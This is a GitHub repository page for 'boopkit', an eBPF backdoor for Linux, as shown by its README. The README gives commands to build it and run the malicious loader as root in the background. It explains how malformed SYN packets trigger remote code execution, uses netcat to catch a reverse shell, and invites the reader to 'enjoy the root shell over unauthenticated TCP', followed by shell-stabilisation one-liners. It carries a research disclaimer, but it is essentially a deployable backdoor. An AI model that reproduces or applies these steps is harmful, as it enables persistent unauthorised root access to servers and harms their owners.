Skip to content
/ boopkit Public
forked from krisnova/boopkit

Linux eBPF backdoor over TCP. Spawn reverse shells, RCE, on prior privileged access.

License

Apache-2.0 license
0 stars 175 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Exceltior/boopkit

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

30 Commits
remote
remote
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
Makefile
Makefile
 
 
README.md
README.md
 
 
loader.c
loader.c
 
 
probe.c
probe.c
 
 
proto.h
proto.h
 
 

Repository files navigation

Boopkit

A research project to demonstrate remote code injection over TCP with a malicious eBPF probe.

This is NOT an exploit! This requires prior priviliged access on a server in order to work!

Disclaimer

I am a professional security researcher. These are white hat tools used for research purposes only.

Seriously please use these responsibly.

Demo

Install boopkit on a server that is already running any TCP service (EG: Kubernetes, SSH, nginx, etc).

git clone [email protected]:kris-nova/boopkit.git
cd boopkit
make
sudo ./boopkit > /var/log/boop.log &

Trigger a reverse shell over an existing TCP service. Edit the remote launcher script and point it at any TCP server running on the exploited machine!

cd remote
# edit ./emote as needed
./remote
python -c "import pty; pty.spawn('/bin/bash')"

Enjoy the root shell over unauthenticated TCP.

Components

eBPF Probe Malicious Userspace Program Remote Trigger
Responsible for sending tracepoint/tcp/tcp_bad_sum events to userspace Persistent process in Linux, that does the dirty work Remote way to trigger the RCE over a network and TCP server

eBPF Probe

Can be loaded into the kernel at runtime using the userspace loader program. The probe responds to tcp/tcp_bad_csum events and will pass the saddr (Source Address) up to userspace using an eBPF map.

Loader Program

This is the malicious program that will respond to the bad checksum packets sent to the server. Whenever a malicious packet is sent, the loader program responds with remote code execution.

Trigger/Remote

The trigger binary is a small C program that will send a malformed SYN request without a properly calculated checksum to the server.

The remote script wraps the trigger and will use netcat to listen for a reverse shell.

eBPF and Loader Compile Time Dependencies

  • 'clang'
  • 'linux-headers'
  • 'llvm'
  • 'libbpf'
  • 'lib32-glibc'

Boopkit runtime dependencies

  • Linux kernel with eBPF enabled/supported
  • Ncat running on the server
  • Root access :)

Reverse Shell Stabilization

After a successful /remote the shell will be very unsightly.

Select one of the commands to run in order to start a cleaner shell.

python -c "import pty; pty.spawn('/bin/bash')"
ruby -e "exec '/bin/bash'"
perl -e "exec '/bin/bash';"

Next move the newly created shell to the background on your local terminal.

Ctrl + z

Update the stty locally.

stty raw -echo && fg

Finally, reconfigure the terminal!

export TERM=xterm-256-color

Source: jasonturley.xyz

About

Linux eBPF backdoor over TCP. Spawn reverse shells, RCE, on prior privileged access.

Resources

Readme

License

Apache-2.0 license
Activity
Custom properties

Stars

0 stars

Watchers

2 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • C 91.1%
  • Shell 6.4%
  • Makefile 2.5%